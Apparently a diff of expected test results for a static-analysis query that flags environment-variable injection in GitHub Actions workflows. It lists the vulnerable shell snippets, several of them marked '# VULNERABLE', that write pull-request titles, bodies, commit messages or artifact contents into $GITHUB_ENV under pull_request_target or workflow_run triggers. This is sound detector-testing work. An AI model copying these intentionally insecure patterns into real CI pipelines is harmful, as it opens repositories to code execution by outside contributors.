| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | 
@@ -92,40 +129,3 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths -#select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
